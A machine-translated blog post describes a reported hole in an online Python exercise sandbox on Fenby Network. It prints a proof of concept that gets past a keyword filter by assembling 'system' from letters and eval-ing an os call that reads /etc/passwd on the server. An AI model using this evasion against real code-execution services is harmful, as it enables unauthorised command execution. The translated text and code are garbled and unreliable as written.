Today, I saw an interesting loophole in Wooyun. Say it interesting, the first is the idea is very special, of course, because the security is very low, the second use of the Python POC has a small details, hereby share.
Website called Fenby Network, mainly for Pythoner online learning, it has an online exercise function, you can enter the code, and then execute, test run the results ...
So the landlord registered an account, URL:http://www.fenby.com/course/units/xxxx
Then enter the following malicious code:
Import strings = ["s", "Y", "s", "T", "E", "M"]s = "" ". Join (s) cmd =" cat/etc/passwd "code =" __import__ (' OS '). "+ S +" (' "+ cmd + "')" eval (code)
So that's it ...
650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M02/6C/9A/wKioL1VN6AWiXCoBAAGITIL72WQ123.jpg "title=" Poc.png "alt=" Wkiol1vn6awixcobaagitil72wq123.jpg "/>
Here I would like to say two points, the first cause of the vulnerability is not filtering eval, the second code used in the different import and __import__.
Import is actually called __import__ but if it is written directly as Code = "__import__ (' Package.module '), it does not mean to say: Import Package.module as Package
when thenamevariable is of the formpackage.module
, normally, the top-level package (the name up till the first dot) is returned, notThe module named byname.
This article from "Lao Xu's Private Food" blog, declined to reprint!
Interesting examples of Python penetration